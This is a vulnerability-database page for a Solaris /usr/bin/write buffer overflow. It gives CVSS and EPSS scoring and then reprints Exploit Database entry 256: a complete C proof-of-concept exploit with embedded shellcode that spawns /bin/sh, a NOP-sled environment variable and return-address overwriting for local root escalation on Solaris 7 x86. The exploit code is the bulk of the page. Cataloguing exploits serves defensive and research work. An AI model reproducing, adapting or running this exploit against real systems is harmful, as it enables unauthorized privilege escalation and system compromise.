Metrics
Metrics |
Score |
Severity |
CVSS Vector |
Source |
V2 |
7.2 |
|
AV:L/AC:L/Au:N/C:C/I:C/A:C |
[email protected] |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 256
Publication date : 2001-01-24 23h00 +00:00
Author : Pablo Sor
EDB Verified : Yes
#include <stdio.h>
#include <unistd.h>
/*
/usr/bin/write overflow proof of conecpt.
Tested on Solaris 7 x86
Pablo Sor, Buenos Aires, Argentina. 01/2000
[email protected]
usage: write-exp [shell_offset] [ret_addr_offset]
default offset should work.
*/
long get_esp() { __asm__("movl %esp,%eax"); }
char shell[] =
"\xeb\x45\x9a\xff\xff\xff\xff\x07\xff"
"\xc3\x5e\x31\xc0\x89\x46\xb7\x88\x46"
"\xbc\x88\x46\x07\x89\x46\x0c\x31\xc0"
"\xb0\x2f\xe8\xe0\xff\xff\xff\x52\x52"
"\x31\xc0\xb0\xcb\xe8\xd5\xff\xff\xff"
"\x83\xc4\x08\x31\xc0\x50\x8d\x5e\x08"
"\x53\x8d\x1e\x89\x5e\x08\x53\xb0\x3b"
"\xe8\xbe\xff\xff\xff\x83\xc4\x0c\xe8"
"\xbe\xff\xff\xff\x2f\x62\x69\x6e\x2f"
"\x73\x68\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff";
/* shellcode by Cheez Whiz */
void main(int argc,char **argv)
{
FILE *fp;
long magic,magicret;
char buf[100],*envi;
int i;
envi = (char *) malloc(1000*sizeof(char));
memset(envi,0x90,1000);
memcpy(envi,"SOR=",4);
memcpy(envi+980-strlen(shell),shell,strlen(shell));
envi[1000]=0;
putenv(envi);
if (argc!=3)
{
magicret = get_esp()+116;
magic = get_esp()-1668;
}
else
{
magicret = get_esp()+atoi(argv[1]);
magic = get_esp()+atoi(argv[2]);
}
memset(buf,0x41,100);
buf[99]=0;
memcpy(buf+91,&magic,4);
for(i=0;i<22;++i) memcpy(buf+(i*4),&magicret,4);
execl("/usr/bin/write","write","root",buf,(char *)0);
}
// milw0rm.com [2001-01-25]
Products Mentioned
Configuraton 0
Sun>>Sunos >> Version -
Sun>>Sunos >> Version 5.5.1
Sun>>Sunos >> Version 5.7
References